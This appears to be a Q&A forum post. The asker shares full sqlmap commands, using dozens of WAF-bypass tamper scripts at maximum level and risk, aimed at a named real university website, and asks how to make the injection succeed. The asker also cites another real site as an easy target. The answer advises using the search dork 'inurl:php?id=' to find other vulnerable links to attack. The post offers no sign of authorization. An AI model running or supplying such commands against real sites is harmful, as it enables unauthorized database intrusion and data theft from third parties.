sql-injectionsqlmap

Sqlmap parameter "might not be injectable"


Im starting with sqlmap and I have the following doubt: When I try to use sqlmap (trying to bypass waf) using this snippet:

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?option=com_newsfeeds&view=newsfeed&id=1&feedid=1&Itemid=18" --dbs --dbms=mysql --time-sec=10 --hex --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

or this one:

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?view=article&catid=35:pagina-principal&id=44:inicio-central&format=pdf" --dbs --dbms=mysql --time-sec=10 --hex --string --regexp --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

I saw that in the console appears:

[WARNING] heuristic (basic) test shows that GET parameter 'option' might not be injectable [WARNING] heuristic (basic) test shows that GET parameter 'view' might not be injectable

Also tried to find a url inside my site similar to: http://www.cafe53rd.com/menu.php?item_id=3 Because I checked that this kind of url its easiest to access but I cant find it for the site Im auditing.

What would be the right code to make it in the following Site ("http://prefing...")

Sorry for my bad english. Thank you very much.


Solution

  • This error just suggests that the type of Injection Technique which is being executed does not give positive responses. I already faced it and solved it by getting an alternate link. I suggest find some other vulnerable links , using search inurl:php?id= and then insert the link in sqlmap.